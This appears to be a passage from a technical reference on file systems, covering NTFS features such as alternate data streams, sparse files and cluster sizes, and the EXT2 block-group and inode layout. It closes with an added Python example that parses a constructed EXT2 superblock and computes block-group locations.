:file3

A file can be associated with more than one application at a time, such as Microsoft® Word and Microsoft® WordPad. For instance, a file structure like the following illustrates file association, but not multiple files:

program:source_file

:doc_file

:object_file

:executable_file

You can use the Win32 application programming interface (API) CreateFile to create an alternate data stream, or, at the command prompt, type commands such as:

echo text>program:source_file

more <program:source_file

Because a plain dir listing shows only the main (unnamed) stream and its size, alternate streams are a common place for hiding data; on Windows Vista and later, dir /R lists every stream of a file.




Caution

Because NTFS is not supported on floppy disks, when you copy an NTFS file to a floppy disk (or to any other volume that is not NTFS), data streams and other attributes not supported by FAT are lost without warning.

Reparse Points

Reparse points are new file system objects in the version of NTFS included with Windows 2000. Reparse points have a definable attribute containing user-controlled data and are used to extend functionality in the input/output (I/O) subsystem.

Change Journal

The change journal is used by NTFS to provide a persistent log of all changes made to files on the volume. For each volume, NTFS uses the change journal to track information about added, deleted, and modified files. The change journal is much more efficient than time stamps or file notifications for determining changes in a given namespace.

The change journal is implemented as a sparse stream in which only a small active range uses any disk allocation. The active range initially begins at offset 0 in the stream and moves monotonically forward. The unique sequence number (USN) of a particular record represents its virtual offset in the stream. As the active range moves forward through the stream, earlier records are deallocated and become unavailable. The size of the active range in a sparse file can be adjusted.

Encryption

File and directory-level encryption is implemented in the version of NTFS included with Windows 2000 for enhanced security in NTFS volumes. Windows 2000 uses Encrypting File System (EFS) to store data in encrypted form, which provides security when the storage media are removed from a system running Windows 2000.

Sparse File Support

Sparse files allow programs to create very large files while consuming disk space only as needed. A sparse file carries an attribute that makes the I/O subsystem allocate disk space only for the file's meaningful (nonzero) data: all nonzero data is allocated on disk, whereas long runs of zeros are not. When a sparse file is read, allocated data is returned as it was stored, and unallocated ranges are returned, by default, as zeros, in accordance with the C2 security requirement that a process must never see stale data from previously freed disk space.

NTFS includes full sparse file support for both compressed and uncompressed files. By default a read of a sparse file returns the entire requested range, allocated and sparse alike; an application can instead query which ranges are allocated and retrieve only those, without reading the whole data set.

You can set a user-controlled file system attribute to take advantage of the sparse file function in NTFS. With the sparse file attribute set, the file system can deallocate data from anywhere in the file and, when an application reads a deallocated range, yield zeros for that range instead of storing and returning the actual data. File system APIs allow the file to be copied or backed up as actual bits plus a list of sparse ranges. The net result is efficient file system storage and access. The figure (not reproduced here) shows how data is stored with and without the sparse file attribute set.


Structure of an NTFS Volume

Like FAT, NTFS uses clusters as the fundamental unit of disk allocation. In the Disk Management snap-in of Windows 2000 you can specify a cluster size of up to 4 KB. If you type format at the command prompt to format your NTFS volume but do not specify an allocation unit size with the /A:<size> switch, the values in the table below are used.

Table  Default Cluster Sizes for NTFS

Volume Size                 Sectors per Cluster   Default Cluster Size
===========                 ===================   ====================
512 MB or less              1                     512 bytes
513 MB–1,024 MB (1 GB)      2                     1,024 bytes (1 KB)
1,025 MB–2,048 MB (2 GB)    4                     2,048 bytes (2 KB)
Greater than 2,048 MB       8                     4,096 bytes (4 KB)

Note

Windows 2000, like Windows NT 3.51 and Windows NT 4.0, supports file compression. Since file compression is not supported on cluster sizes above 4 K, the default NTFS cluster size for Windows 2000 never exceeds 4 K.


The Second Extended (EXT2)


Figure: Physical Layout of the EXT2 File system

The Second Extended File system was devised (by Rémy Card) as an extensible and powerful file system for Linux. At the time this description was written it was the most widely used file system in the Linux community and the basis of all shipping Linux distributions; its successors ext3 and ext4 extend the same on-disk design.

The EXT2 file system, like many file systems, is built on the premise that the data held in files is kept in data blocks. These data blocks are all of the same length and, although that length can vary between different EXT2 file systems, the block size of a particular EXT2 file system is fixed when it is created (using mke2fs). Every file's size is rounded up to an integral number of blocks: if the block size is 1024 bytes, a file of 1025 bytes occupies two 1024-byte blocks. Unfortunately this means that on average half a block is wasted per file. Usually in computing you trade off CPU usage against memory and disk space utilisation; in this case Linux, along with most operating systems, accepts relatively inefficient disk usage in order to reduce the workload on the CPU.

Not all of the blocks in the file system hold data; some must be used to contain the information that describes the structure of the file system. EXT2 defines the file system topology by describing each file in the system with an inode data structure. An inode records which blocks the data within a file occupies, as well as the access rights of the file, the file's modification times and the type of the file. Every file in the EXT2 file system is described by a single inode, and each inode has a single unique number identifying it. The inodes for the file system are all kept together in inode tables. EXT2 directories are simply special files (themselves described by inodes) which contain pointers to the inodes of their directory entries.

The figure shows the layout of the EXT2 file system as occupying a series of blocks in a block-structured device. As far as each file system is concerned, block devices are just a series of blocks which can be read and written. A file system does not need to concern itself with where on the physical media a block should be put; that is the job of the device's driver. Whenever a file system needs to read information or data from the block device containing it, it requests that its supporting device driver read an integral number of blocks. The EXT2 file system divides the logical partition that it occupies into Block Groups. Each group duplicates information critical to the integrity of the file system as well as holding real files and directories as blocks of information and data. This duplication is necessary should a disaster occur and the file system need recovering. The subsections describe in more detail the contents of each Block Group.
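As an added example that is not part of the original text, the Python script below reads the EXT2 superblock (the structure stored 1024 bytes into the partition that records the block size and the block-group geometry described above) from a constructed image and performs the block-group arithmetic the text describes: how many groups the volume has, which group holds a given inode or block, and how many blocks a file of a given size occupies together with the space wasted in its last block. The superblock field offsets are those of the ext2 on-disk format; the volume geometry (64 MiB, 1 KiB blocks, 8 groups) is invented for the example.

```python
"""EXT2 superblock parser and block-group arithmetic (added example).

The superblock bytes are constructed here with the ext2 field offsets; the
superblock always starts 1024 bytes into the partition. The volume geometry
is made up, not taken from a real file system.
"""
import struct

EXT2_SUPER_MAGIC = 0xEF53
SUPERBLOCK_OFFSET = 1024
SUPERBLOCK_SIZE = 1024
SB_HEAD_FMT = "<IIIIIIIiIIIIIHhH"   # s_inodes_count .. s_magic, bytes 0-57 of the superblock


def parse_superblock(image):
    """Read the superblock at byte 1024 and derive block size and block-group layout."""
    sb = image[SUPERBLOCK_OFFSET:SUPERBLOCK_OFFSET + SUPERBLOCK_SIZE]
    if len(sb) < SUPERBLOCK_SIZE:
        raise ValueError("image too short to hold a superblock")
    (inodes, blocks, _r_blocks, free_blocks, free_inodes, first_data_block,
     log_block_size, _log_frag, blocks_per_group, _frags_per_group, inodes_per_group,
     _mtime, _wtime, mnt_count, max_mnt_count, magic) = struct.unpack_from(SB_HEAD_FMT, sb, 0)
    if magic != EXT2_SUPER_MAGIC:
        raise ValueError(f"bad magic {magic:04X}h, expected EF53h")
    if log_block_size > 6:
        raise ValueError("implausible block size")
    block_size = 1024 << log_block_size               # chosen by mke2fs, fixed for the life of the fs
    if (first_data_block == 1) != (block_size == 1024):
        raise ValueError("first data block must be 1 for 1 KiB blocks and 0 otherwise")
    if blocks_per_group == 0 or blocks_per_group > 8 * block_size:
        raise ValueError("blocks per group must fit in one block bitmap")
    if inodes_per_group == 0 or inodes_per_group > 8 * block_size:
        raise ValueError("inodes per group must fit in one inode bitmap")
    groups = -(-(blocks - first_data_block) // blocks_per_group)   # ceiling division
    if groups * inodes_per_group != inodes:
        raise ValueError("inode count does not match groups * inodes per group")
    rev_level = struct.unpack_from("<I", sb, 76)[0]
    inode_size = struct.unpack_from("<H", sb, 88)[0] if rev_level >= 1 else 128
    return {"block_size": block_size, "blocks": blocks, "inodes": inodes,
            "first_data_block": first_data_block, "blocks_per_group": blocks_per_group,
            "inodes_per_group": inodes_per_group, "block_groups": groups,
            "group_desc_block": first_data_block + 1,    # descriptor table follows the superblock
            "inode_size": inode_size, "free_blocks": free_blocks, "free_inodes": free_inodes,
            "mounts_since_check": mnt_count, "max_mounts": max_mnt_count}


def inode_location(sb, ino):
    """Block group and index within that group's inode table for inode number ino.
    Inode numbers start at 1; inode 2 is the root directory."""
    if ino < 1 or ino > sb["inodes"]:
        raise ValueError(f"inode {ino} out of range")
    return (ino - 1) // sb["inodes_per_group"], (ino - 1) % sb["inodes_per_group"]


def block_group_of_block(sb, block):
    """Block group that owns a given block number."""
    if block < sb["first_data_block"] or block >= sb["blocks"]:
        raise ValueError(f"block {block} out of range")
    return (block - sb["first_data_block"]) // sb["blocks_per_group"]


def blocks_for_file(size, block_size):
    """Blocks a file of the given size occupies, and the bytes wasted in its last block."""
    blocks = -(-size // block_size)
    return blocks, blocks * block_size - size


# ---- constructed 64 MiB volume: 1 KiB blocks, 8 groups of 8192 blocks ----
def sample_ext2_image():
    sb = bytearray(SUPERBLOCK_SIZE)
    struct.pack_into(SB_HEAD_FMT, sb, 0,
                     16384,    # s_inodes_count
                     65536,    # s_blocks_count
                     3276,     # s_r_blocks_count (5 % reserved for root)
                     60000,    # s_free_blocks_count
                     16000,    # s_free_inodes_count
                     1,        # s_first_data_block (1 for 1 KiB blocks)
                     0,        # s_log_block_size: 1024 << 0
                     0,        # s_log_frag_size
                     8192,     # s_blocks_per_group
                     8192,     # s_frags_per_group
                     2048,     # s_inodes_per_group
                     0, 0,     # s_mtime, s_wtime
                     3, 20,    # s_mnt_count, s_max_mnt_count
                     EXT2_SUPER_MAGIC)
    struct.pack_into("<I", sb, 76, 1)            # s_rev_level: dynamic revision
    struct.pack_into("<IH", sb, 84, 11, 128)     # s_first_ino, s_inode_size
    return bytes(SUPERBLOCK_OFFSET) + bytes(sb)  # boot area, then the superblock


if __name__ == "__main__":
    sb = parse_superblock(sample_ext2_image())
    print(f"{sb['block_size']} byte blocks, {sb['blocks']} blocks in {sb['block_groups']} groups")
    print("root inode 2 lives in group %d, index %d" % inode_location(sb, 2))
    print("a 1025-byte file uses %d blocks, wasting %d bytes" % blocks_for_file(1025, sb["block_size"]))
```

The consistency checks before any arithmetic (magic value, bitmap sizes, inode count against group count) are the ones a forensic tool wants before trusting a superblock from a disk it did not create; a corrupted or crafted superblock otherwise yields group and inode offsets that point anywhere on the device.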